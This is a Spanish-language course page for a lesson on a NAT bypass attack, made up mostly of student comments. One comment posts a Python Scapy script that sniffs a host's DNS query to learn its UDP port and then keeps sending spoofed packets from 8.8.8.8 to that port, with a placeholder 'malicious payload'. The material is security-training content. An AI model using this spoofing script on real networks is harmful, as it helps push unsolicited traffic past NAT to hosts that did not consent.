No tienes acceso a esta clase

¡Continúa aprendiendo! Únete y comienza a potenciar tu carrera

Ataque NAT Bypass

18/33
Recursos

Aportes 7

Preguntas 1

Ordenar por:

Los aportes, preguntas y respuestas son vitales para aprender en comunidad. Regístrate o inicia sesión para participar.

El curso es excelente, tan bueno y completo que llego a perderme en varias partes. Es para repasarlo una y otra vez. El contenido sí vale la pena.

en casi de que raw no te funciona

d = r"Esto podira ser codigo malicioso"

esto es por la versión que usa python

Se aprende muhco en cada clase.

Con el siguiente script se puede automatizar un poco el proceso:

#!/usr/bin/python3

from scapy.all import sniff, UDP, Ether, IP, sendp

port = 0
def print_summary(pkt):
    global port
    if pkt[UDP].sport != None:
        port=pkt[UDP].sport


while port == 0:
	packets = sniff(filter="dst host 8.8.8.8 and dst port 53 and src host 192.168.120.1 and udp", count=1, iface="eth0", timeout=1, prn=print_summary)


a = Ether()
b = IP(src="8.8.8.8", dst="192.168.120.1")
c = UDP(sport=53, dport=port)
d = r"Malicious payload"

packet = a/b/c/d
sendp(packet, loop=1, inter=3, iface="eth0")

Muy interesante la herramienta Scapy 🐍

Lo de raw me funciono con:

d = "Codigo malicioso"

Me quedó la duda, en que lenguaje debe estar escrito el código malicioso se puede insertar en el raw?